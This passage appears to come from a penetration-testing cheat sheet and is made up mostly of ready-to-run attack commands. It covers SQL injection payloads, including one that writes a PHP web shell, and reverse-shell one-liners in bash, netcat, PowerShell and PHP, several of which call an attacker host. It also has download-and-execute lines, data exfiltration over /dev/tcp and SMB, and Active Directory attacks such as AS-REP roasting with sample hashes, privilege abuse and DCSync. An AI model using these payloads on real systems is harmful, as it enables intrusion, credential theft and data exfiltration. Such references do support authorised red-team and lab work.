^`](#overview)** rpcclient -U "" -N 172.16.1.5 rpcclient -u "Administrator" -N 17.16.1.5 Commands: * `enumdomusers` * `netshareenum` * `netshareenumall` * `querydominfo` * `lookupname root` * `queryuser john` Connect to an RPC share without a username and password and enumerate privileges: rpcclient --user="" --command=enumprivs -N 172.20.10.5 Connect to an RPC share with a username and enumerate privileges: rpcclient --user="" --command=enumprivs 172.20.10.5 #### enum4linux **[`^ back to top ^`](#overview)** All info: enum4linux -a 172.16.1.5 With user and blank pass: enum4linux -a -u administrator -p "" 172.16.1.5 ## 3. Vulnerability Assesment/Exploiting **[`^ back to top ^`](#overview)** ### 3.1 Useful Websites **[`^ back to top ^`](#overview)** * [cvedetails.com](https://www.cvedetails.com) – CVE security vulnerability database. * [exploit-db.com](https://www.exploit-db.com) – archive of public exploits. * [rapid7.com/db/](https://www.rapid7.com/db/) – Rapid7 vulnerability & exploit database. * [sploitus.com](https://sploitus.com/) – exploit and hacker tool search engine. * [sploitify.haxx.it](https://sploitify.haxx.it/) – exploit index. * [cxsecurity.com](https://cxsecurity.com/wlb) – bugtraq and exploit database. * [hakluke/weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads) – collection of weaponized XSS payloads. * [namecheap.com](https://www.namecheap.com) – buy domains for cheap. * [streaak/keyhacks](https://github.com/streaak/keyhacks) – validate API keys. * [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) – list of useful payloads and bypasses. * [jwt.io](https://jwt.io) – decode, verify, and generate JWTs. * [portswigger.net/web-security](https://portswigger.net/web-security) – Web Security Academy learning materials. * [ired.team](https://www.ired.team/) – notes on Red Teaming and Weaponization. * [bigiamchallenge.com](https://bigiamchallenge.com) – nice AWS CTF. * [f-secure.com/text-message-checker](https://www.f-secure.com/en/text-message-checker) – SMS phishing checker. * [f-secure.com/online-shopping-checker](https://www.f-secure.com/en/online-shopping-checker) – online shopping scam checker. * [browserling.com](https://www.browserling.com/) – cross-browser testing sandbox. * [extsentry.github.io](https://extsentry.github.io/) – Chrome extension vulnerability assessment. * [useragentstring.com](https://www.useragentstring.com/) – detailed User-Agent parsing. ### Collaborator Servers **[`^ back to top ^`](#overview)** Used when trying to exploit an open redirect, blind cross-site scripting (XSS), DNS and HTTP interactions, etc. * [interactsh.com](https://app.interactsh.com) * [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator) * [canarytokens.org](https://canarytokens.org/generate) * [webhook.site](https://webhook.site) ### Subdomain Takeover **[`^ back to top ^`](#overview)** Biggest cloud service providers: * [aws.amazon.com](https://aws.amazon.com) * [azure.microsoft.com](https://azure.microsoft.com) * [cloud.google.com](https://cloud.google.com) * [wordpress.com](https://wordpress.com) * [shopify.com](https://www.shopify.com) ### Search Exploits and Scanners **[`^ back to top ^`](#overview)** apt install docker.io docker run -d -p 443:443 --name openvas mikesplain/openvas This command will both pull the docker container and then run the container. It may take a few minutes for the container to fully set up and begin running. Once it is complete you can then navigate to `https://127.0.0.1` in your preferred browser and OpenVAS will be setup and ready to go! Below are the default credentials to access OpenVAS/GVM: Username: admin Password: admin Search exploit for service: searchsploit squirrelmail 1.4 ### Subzy **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/lukasikic/subzy@latest](https://github.com/lukasikic/subzy@latest) Check for subdomains takeover: subzy -concurrency 100 -timeout 3 -targets subdomains_errors.txt | tee subzy_results.txt ### subjack **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/haccer/subjack@latest](https://github.com/haccer/subjack@latest) Check for subdomains takeover: subjack -v -o subjack_results.json -t 100 -timeout 3 -a -m -w subdomains_errors.txt ### Nikto **[`^ back to top ^`](#overview)** Scan a web server: nikto -output nikto_results.txt -h somesite.com -p 80 ### WPScan **[`^ back to top ^`](#overview)** Scan a WordPress website: wpscan -o wpscan_results.txt --url somesite.com ### Joomla **[`^ back to top ^`](#overview)** joomscan --url http:// ### Nuclei **[`^ back to top ^`](#overview)** Installation and updating: go install -v [github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest](https://github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest) nuclei -up && nuclei -ut Vulnerability scan, all templates: nuclei -c 500 -o nuclei_results.txt -l subdomains_live_long_2xx_4xx.txt cat nuclei_results.txt | grep -Po '(?<=\ ).+' | sort -uf > nuclei_sorted_results.txt Only subdomain takeover: nuclei -c 500 -t takeovers -o nuclei_takeover_results.txt -l subdomains_live.txt ### Arjun **[`^ back to top ^`](#overview)** Discover request parameters: arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -u [https://somesite.com](https://somesite.com) arjun --stable -oT arjun_results.txt -oJ arjun_results.json -T 3 -t 5 --passive -m GET -i subdomains_live_long_2xx.txt ### Insecure Direct Object Reference (IDOR) **[`^ back to top ^`](#overview)** First, try to simply change one value to another, e.g., change `victim@gmail.com` to `hacker@gmail.com`, change some ID from `1` to `2`, etc. It is likely that lower number IDs will relate to some higher privilege accounts or roles. Second, try parameter pollution: "email":"hacker@gmail.com,victim@gmail.com" "email":"hacker@gmail.com victim@gmail.com" "email":"hacker@gmail.com","email":"victim@gmail.com" "email":"victim@gmail.com,hacker@gmail.com" "email":"victim@gmail.com hacker@gmail.com" "email":"victim@gmail.com","email":"hacker@gmail.com" "email":("hacker@gmail.com","victim@gmail.com") "email":["hacker@gmail.com","victim@gmail.com"] "email":{"hacker@gmail.com","victim@gmail.com"} "email":("victim@gmail.com","hacker@gmail.com") "email":["victim@gmail.com","hacker@gmail.com"] "email":{"victim@gmail.com","hacker@gmail.com"} email=hacker%40gmail.com,victim%40gmail.com email=hacker%40gmail.com%20victim%40gmail.com email=hacker%40gmail.com&email=victim%40gmail.com email[]=hacker%40gmail.com&email[]=victim%40gmail.com email=victim%40gmail.com,hacker%40gmail.com email=victim%40gmail.com%20hacker%40gmail.com email=victim%40gmail.com&email=hacker%40gmail.com email[]=victim%40gmail.com&email[]=hacker%40gmail.com To generate the above output, run [param_pollution.py](./scripts/param_pollution.py): python3 param_pollution.py -n email -i victim@gmail.com -t hacker@gmail.com ### HTTP Response Splitting **[`^ back to top ^`](#overview)** Also known as CRLF injection. CRLF refers to carriage return (`ASCII 13`, `\r`) and line feed (`ASCII 10`, `\n`). When encoded, `\r` refers to `%0D` and `\n` refers to `%0A`. Fixate a session cookie: somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789 Open redirect: somesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com Session fixation and open redirection are one of many techniques used in combination with HTTP response splitting. Search the Internet for more techniques. ### Cross-Site Scripting (XSS) **[`^ back to top ^`](#overview)** Simple cross-site scripting (XSS) payloads: Hosting JavaScript on [Pastebin](https://pastebin.com) won't work because Pastebin always returns `text/plain` content type. Find out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks in project at [ivan-sincek/xss-catcher](https://github.com/ivan-sincek/xss-catcher). Valid RFC emails with embedded XSS: user+()@somedomain.com user@somedomain().com ""@somedomain.com ### SQL Injection **[`^ back to top ^`](#overview)** Boolean-based SQLi: ' OR 1=1-- ' OR 1=2-- Union-based SQLi: ' UNION SELECT 1,2,3,4-- ' UNION SELECT NULL,NULL,NULL,NULL-- ' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- ' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- ' UNION SELECT 1,load_file('..\\..\\apache\\conf\\httpd.conf'),3,4-- If using, e.g., `1,2,3,4` does not work, try using `NULL,NULL,NULL,NULL` respectively. Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results. The goal is to determine the exact number of columns in the SQL query and to figure out which of them are shown back to the user. Another way to determine the exact number of columns is by using, e.g., `' ORDER BY 1-- `, where `1` is the column number used for sorting – incrementing it by one on each try. Time-based SQLi: ' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- ' AND (SELECT 1 FROM (SELECT CASE user() WHEN 'root@127.0.0.1' THEN sleep(2) ELSE sleep(0) END) test)-- ' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- ' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- ' AND IF(version() LIKE '5%',sleep(2),sleep(0))-- Use the time-based SQLi when you are not able to see the results. Check for the existance/correctness: ' AND (SELECT 'exists' FROM users) = 'exists ' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists ' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) < 8 ) = 'correct ' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct '||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||' Inject a [simple PHP web shell](https://github.com/kraloveckey/ghostpack-binaries/blob/main/php-reverse-shell/src/web/simple_php_web_shell_get.php) based on HTTP GET request: ' UNION SELECT '', '', '', '' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- ' UNION SELECT '', '', '', '0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o="ERROR: The function might be disabled.";}else{$o=str_replace("<","<",$o);$o=str_replace(">",">",$o);}} ?>Simple PHP Web Shell
' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- ### sqlmap **[`^ back to top ^`](#overview)** Inject SQL code into request parameters: sqlmap -a -u [somesite.com/index.php?username=test&password=test](https://somesite.com/index.php?username=test&password=test) sqlmap -a -u [somesite.com/index.php](https://somesite.com/index.php) --data username=test&password=test sqlmap -a -u [somesite.com/index.php](https://somesite.com/index.php) --data username=test&password=test -p password Check the site for SQL injection via the `list[fullordering]` parameter using the most aggressive settings, and if a vulnerability is found, extract the list of databases: sqlmap -u "http:///index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] Check SQL Injection in `nagions`: sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=1ec86e6d63a7db533923217f3db57a35a244e800" --level 5 --risk 3 -p id Pull nagios the database: ```shell sqlmap -u "https:////nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https:///nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --dump | Option | Description | | --- | --- | | -u | Target URL | | -H | Extra HTTP header | | --data | Data string to be sent through POST | | --cookie | HTTP Cookie header value | | --proxy | Use a proxy to connect to the target URL (protocol://host:port) | | -p | Testable parameter(s) | | --level | Level of tests to perform (1-5, default: 1) | | --risk | Risk of tests to perform (1-3, default: 1) | | -a | Retrieve everything | | -b | Retrieve DBMS banner | | --dump-all | Dump all DBMS databases tables entries | | --os-shell | Prompt for an interactive operating system shell | | --os-pwn | Prompt for an OOB shell, Meterpreter, or VNC | | --sqlmap-shell | Prompt for an interactive sqlmap shell | | --wizard | Simple wizard interface for beginner users | | --dbms | To do. | ### dotdotpwn **[`^ back to top ^`](#overview)** Traverse a path (e.g., `somesite.com/../../../etc/passwd`): dotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com dotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com dotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u '[https://somesite.com/index.php?file=TRAVERSAL](https://somesite.com/index.php?file=TRAVERSAL)' Try to prepend a protocol such as `file://`, `gopher://`, `dict://`, `php://`, `jar://`, `ftp://`, `tftp://`, etc., to the file path; e.g, `file://TRAVERSAL`. Check some additional directory traversal tips at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/README.md). Credits to the author! | Option | Description | | --- | --- | | -m | Module (http, http-url, ftp, tftp payload, stdout) | | -h | Hostname | | -O | Operating System detection for intelligent fuzzing (nmap) | | -o | Operating System type if known ("windows", "unix", or "generic") | | -d | Depth of traversals (default: 6) | | -f | Specific filename (default: according to OS detected) | | -S | Use SSL for HTTP and Payload module (not needed for http-url) | | -u | URL with the part to be fuzzed marked as TRAVERSAL | | -k | Text pattern to match in the response | | -p | Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword | | -x | Port to connect (default: HTTP=80; FTP=21; TFTP=69) | | -U | Username (default: 'anonymous') | | -P | Password (default: 'dot(at)dot.pwn') | | -M | HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET) | | -b | Break after the first vulnerability is found | | -C | Continue if no data was received from host | ### Web Shells **[`^ back to top ^`](#overview)** Find out more about PHP shells in project at [ghostpack-binaries/php-reverse-shell](https://github.com/kraloveckey/ghostpack-binaries/tree/main/php-reverse-shell). Find out more about Java/JSP shells in project at [ivan-sincek/java-reverse-tcp](https://github.com/ivan-sincek/java-reverse-tcp). ### Send a Payload With Python **[`^ back to top ^`](#overview)** Find out how to generate a reverse shell payload for Python and send it to the target machine in project at [ivan-sincek/send-tcp-payload](https://github.com/ivan-sincek/send-tcp-payload). ### SMTP Enum Users: nc -vn target 25 VRFY User_to_test VRFY root answer = 252 2.0.0 root means That this user Exist here. VRFY bla answer = 550 5.1.1 means that bla doesn't exist here. Reading emails using telnet: telnet Ip_target port $ telnet 172.20.10.2 110 USER username PASS password list retr 1 ## 4. Post Exploitation **[`^ back to top ^`](#overview)** ### 4.1 Useful Websites **[`^ back to top ^`](#overview)** * [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) * [lolbas-project.github.io](https://lolbas-project.github.io) * [gtfobins.org](https://gtfobins.org/) * [ghostpack-binaries](https://github.com/kraloveckey/ghostpack-binaries) ### Generate a Reverse Shell Payload **[`^ back to top ^`](#overview)** Use [calebstewart/pwncat](https://github.com/calebstewart/pwncat): pip install pwncat-cs Listener: pwncat-cs 192.168.1.1 4444 (To change from pwncat shell to local shell, use Ctrl+D) Also use [`Reverse Shell Generator`](https://www.revshells.com/) or options below. bash -c "bash -i >& /dev/tcp//4444 0<&1" /bin/bash -c 'exec bash -i &>/dev/tcp//4444 <&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4444 >/tmp/f Create Linux payload: echo "bash -c 'bash -i >& /dev/tcp//4444 0<&1'" | base64 echo "bash -c 'bash -i >& /dev/tcp//4444 0>&1'" > shell.sh Create powershell payload: echo -n '$client = New-Object System.Net.Sockets.TCPClient("REMOTE_IP",REMOTE_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64 Execute it: ?cmd=powershell -e payload Create PHP payload: @php system("curl http://:8081/rev.sh|bash"); @endphp Or use [`MSFVenom Payloads`](#generate-a-reverse-shell-payload-via-msfvenom). #### Generate a Reverse Shell Payload via MSFVenom **[`^ back to top ^`](#overview)** Find out how to generate a reverse shell payload for Windows OS, Linux OS, PHP, Java and send it to the target machine in project at [MSFVenom Payloads](msfvenom-payloads.md). ### PowerShell Encoded Command **[`^ back to top ^`](#overview)** To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command: [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script))) To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt: PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command To decode a PowerShell encoded command, run the following PowerShell command: [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command)) Find out more about PowerShell reverse and bind TCP shells in project at [ivan-sincek/powershell-reverse-tcp](https://github.com/ivan-sincek/powershell-reverse-tcp). ### Basics **[`^ back to top ^`](#overview)** #### Stabilizing Linux Shell **[`^ back to top ^`](#overview)** script /dev/null -c bash CTRL+Z stty raw -echo; fg reset screen #### Port Forwarding **[`^ back to top ^`](#overview)** ##### SSH Port Forwarding Proxy `8080` port from remote machine `` to `localhost`: ssh -L 8080:localhost:8080 username@ Proxy `80` port from remote machine `10.10.10.10` to `localhost`: ssh -N -L 80:localhost:80 username@10.10.10.10 -C ##### sshuttle **[`^ back to top ^`](#overview)** Creating VPN tunnel through ssh to any subnet: sshuttle -e "ssh <-i id_rsa_priv.key>" -r user@tunnel_ip & sshuttle -e "ssh -i bob.key" -r bob@10.0.1.1 192.168.1.0/24 192.168.25.0/24 & ##### chisel **[`^ back to top ^`](#overview)** ./chisel server -p 8000 --reverse #Server -- Attacker ./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim For example, there is port 8083. Proxy it to see what it does. Choose chisel, which has a more stable speed. $ wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz $ gzip -d chisel_1.9.1_windows_amd64.gz $ mv chisel_1.9.1_windows_amd64 chisel.exe $ chisel server --port 1133 --reverse 2024/02/21 13:24:22 server: Reverse tunnelling enabled 2024/02/21 13:24:22 server: Fingerprint c/HoJKuWS5e8QfRNRVjGpXQE5Nw5gSXLEFbzFried5M= 2024/02/21 13:24:22 server: Listening on http://0.0.0.0:1133 meterpreter > upload chisel.exe meterpreter > shell Process 5604 created. Channel 3 created. Microsoft Windows [Version 10.0.20348.2322] (c) Microsoft Corporation. All rights reserved. C:\Users\tstark>.\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083 .\chisel.exe client REMOTE_IP:1133 R:8083:127.0.0.1:8083 2024/02/21 09:08:16 client: Connecting to ws://REMOTE_IP:1133 2024/02/21 09:08:18 client: Connected (Latency 156.9429ms) For Linux: ./chisel client REMOTE_IP:1133 R:8083:127.0.0.1:8083 The proxy came out successfully, then open it and take a look: `http://127.0.0.1:8083/`. ##### socat **[`^ back to top ^`](#overview)** On victim: socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 & ##### Netcat Portfwd **[`^ back to top ^`](#overview)** On victim: nc -nlvp 8080 -c "nc localhost 1234" ##### Meterpreter Portfwd **[`^ back to top ^`](#overview)** Proxy port from remote machine to local via `Meterpreter` session: (Meterpreter 2)(C:\Windows\system32) > portfwd add -l 9200 -p 9200 -r 127.0.0.1 [*] Forward TCP relay created: (local) :9200 -> (remote) 127.0.0.1:9200 ##### ligolo-ng **[`^ back to top ^`](#overview)** * [nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) Prepare tunnel interface: ip tuntap add user $(whoami) mode tun ligolo ip link set ligolo up Setup proxy on attacker machine: ./proxy -laddr :443 -selfcert Setup agent on target machine: ./agent -connect :443 -ignore-cert Configure session: ligolo-ng » session [Agent : user@target] » ifconfig ip r add 172.16.1.0/24 dev ligolo [Agent : user@target] » start Port Forwarding: [Agent : user@target] » listener_add --addr 0.0.0.0: --to :80 --tcp [Agent : user@target] » listener_add --addr : --to : --tcp #### Transfering Files Windows **[`^ back to top ^`](#overview)** cmd: iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe" wget -O shell.exe 10.10.10.10:8000/shell.exe certutil -urlcache -f http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe Powershell: Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')" powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')" via SMB: # On attacker python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . # On target copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe #### Transfering Files Linux **[`^ back to top ^`](#overview)** wget http://10.10.10.10:8000/some.sh curl -o some.sh http://10.10.10.10:8000/some.sh via base64: cat shell.sh | base64 -w 0 # On attacker echo | base64 -d > shell.sh # On target via scp: scp some.sh user@10.10.10.10:/tmp/some.sh # On attacker ### Exfiltrating Data **[`^ back to top ^`](#overview)** #### Linux Exfiltrating Data **[`^ back to top ^`](#overview)** On kali: nc -nlvp 80 > datafolder.tmp On target: tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80 On kali: dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar tar xf datafolder.tar #### SSH Exfiltrating Data **[`^ back to top ^`](#overview)** On target: tar zcf - /tmp/datafolder | ssh root@ "cd /tmp; tar zxpf -" On kali: cd /tmp/datafolder #### Windows Exfiltrating Data **[`^ back to top ^`](#overview)** Via SMB server: python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support # On kali net use \\10.10.16.5\share /u:user pass # On victim copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt # On victim Via `pscp`: pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt ### Active Directory and Windows Lateral Movement **[`^ back to top ^`](#overview)** #### ASREPRoast **[`^ back to top ^`](#overview)** `AS-REP Roasting` to get user hashes: $ impacket-GetNPUsers / -usersfile users.txt -outputfile outputusers.txt -dc-ip -no-pass $ cat outputusers.txt $krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4 $krb5asrep$23$lbradford@:1ed6777b1a90024c90cb66b7d3fc3578$8eef92a40e9c405e101e8383169fa8db91202010db8d64a242ab0ec9914d0a17f394b519b3ef8bb138faaba0fb85b91521d0629af96b66eae6e50eed31a9629753ca7f875b803a8546cd368010f40f11a2937576d4129380ec9edfafc18b3e2f2414a08747ba6d3e963a3dfa100dc48d1fb2cec6132343e9bc4bba7aed44ee7e259f24eda2e69ccd93a754133fd133028598f72c6c6d04fc0b9c029e1504454cbc6c2d5cb22f4549810b9b5694d23f6a8726ccbebdb07820bda7ff181dc16c65bdfb375c971833562f6c4efc44fd6a338ad0c2f9d9a30eabc6809ab8a5ef7b9f0a85 $krb5asrep$23$mlowe@:8d268a1ce5040c77262d6fb3e00dd850$4ccd13bd24c517bcc0d6a8aee6030dcec36cdf7ef347b5bace1633fde2438bf675fc57451df849641b5ac4ee13eb603b3a4aa48bff9aee0c7803d9173b3f55289f6ff9cd26a26b9b568e4c72e4c1f78368b9ad28fe0c5a4992c6ac8f347414f19474366bbfe8ae5260e205b08c589d2dbc7adb7ebbc3827cd0071f3e78bf4167c310a4a2514ac044d0540b5d9ba546b19d4f34062f68df5935b9af9f5cff893ceba13c34d452f23249a56e0cc39adc239fad13e6775c8d10541e0ed59594971e7b0f0e792c0b982cd00d4c90fb9aea9d1e44e6ad81a8fa38b2b370b00f241040a106 Get three hashes. Use [hashcat](#hashcat): $ hashcat -m 18200 outputusers.txt /usr/share/wordlists/rockyou.txt $krb5asrep$23$jmontgomery@:7d8cc128c583c382aef2a6fa2d4ec321$cb396eb66b794e5e909d71ffa4cd6685dde517e4b96e493c8e659f0e3ba3115fa7efea11ec14040a382676bd5c37911354af87397d9bd91882c7127304c2194fba95c7f83e15473ace5ec5769f7711d54f91c51b75510b725348e8b78761874a4e54057056c599d94a491a6c9c347221e7215bb99cc528bbeb530293866662b9c23a13981ce41dc105f1a1d331ad818f547cb21fe3e24bc27ba18558cd002a258603b56709bf9670fff20af3bc0a1e8bbde3106439fb27427ddebe4a91cfa09cdfa8642a230f9cd6ea06d331b5d91435235bafaeaeb5200c75b110643f58cb53a0c4:Midnight_121 #### bloodyAD **[`^ back to top ^`](#overview)** Add the USERNAME to the `ServiceMgmt` group, using bloody: bloodyAD -u AUTH_USERNAME -p 'PASSWORD' -d --host IP add groupMember SERVICEMGMT USERNAME [+] USERNAME added to SERVICEMGMT Give USERNAME `GenericAll` permissions on the OU and then change the `winrm_svc` user's password to a different. bloodyAD -d -u AUTH_USERNAME -p 'PASSWORD' --host dc01. add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' USERNAME [+] USERNAME has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB bloodyAD -d -u AUTH_USERNAME -p 'PASSWORD' --host dc01. set password winrm_svc '#Test00#' [+] Password changed successfully! #### Bloodhound **[`^ back to top ^`](#overview)** Bloodhound using for get useful information about domain: ntpdate -s dc01. bloodhound-python -u USERNAME -p 'PASSWORD' -ns IP -d -c All #### CrackMapExec **[`^ back to top ^`](#overview)** apt install -y libssl-dev libffi-dev python-dev build-essential git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec cd CrackMapExec poetry install cp /root/.cme/workspaces/default/smb.db ~/cme_smb.bak rm -f /root/.cme/workspaces/default/smb.db poetry run crackmapexec smb -u guest -p '' --shares --rid-brute 10000 poetry run crackmapexec smb -u anonymous -p "" --rid-brute poetry run crackmapexec smb -u users.txt -p passwords.txt Using the Password spraying, you can find all users also has this password: poetry run crackmapexec smb -u users.txt -p 'PASSWORD' --continue-on-success Use the username dictionary you have obtained to try `ASREPRoast`: poetry run crackmapexec ldap -u users.txt -p '' --asreproast output.txt #### DCSync **[`^ back to top ^`](#overview)** There is a technique that allows to bypass (`The Account is sensitive and cannot be delegated`) it with RBCD (`Resource-based Constrained Delegation`): ntpdate -s dc01. getTGT.py -dc-ip "dc01." /'delegator$' -hashes ':8689904d05752e977a546e201d09e724' export KRB5CCNAME=delegator\$.ccache ntpdate -s dc01. rbcd.py '/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass -dc-ip -debug ntpdate -s dc01. getTGT.py -dc-ip "dc01." ""/'ldap_monitor':'PASSWORD' export KRB5CCNAME=ldap_monitor.ccache ntpdate -s dc01. getST.py -spn "browser/dc01." -impersonate "dc01$" "/ldap_monitor" -k -no-pass export KRB5CCNAME=./delegator\$@dc01..ccache ntpdate -s dc01. getST.py -spn 'http/dc01.' -impersonate 'dc01$' -additional-ticket 'dc01$.ccache' '/delegator$' -k -no-pass export KRB5CCNAME=dc01\$.ccache ntpdate -s dc01. secretsdump.py -no-pass -k dc01. -just-dc-ntlm DCSync is a technique that impersonates a DC by simulating a replication process. secretsdump.py tool is used to carry out this type of attack. It sends an `IDL_DRSGetNCChanges` request to the `DRSUAPI` to replicate LDAP directory objects in a given naming context (NC), in order to retrieve Kerberos keys and the secrets contained in the `NTDS.DIT` database. We can now retrieve the NT hashes of all domain accounts, as we have `dcsync` rights (`DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`): secretsdump.py -no-pass -k dc01. -just-dc-ntlm #### dcom-exec **[`^ back to top ^`](#overview)** $ runas /user:\svc_openfire /netonly powershell Then: $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X")) # or [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.10.X.X")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping 10.10.X.X","7") Use `dcomexec` with `-silentcommand` option to get shell for `svc_openfire` user. For reverse shell use `https://www.revshells.com/` and `PowerShell#3(Base64)`, `OS Windows`: $ impacket-dcomexec -object MMC20 /svc_openfire:'!@#$%^&*(1qazxsw'@ 'cmd.exe /c powershell -e 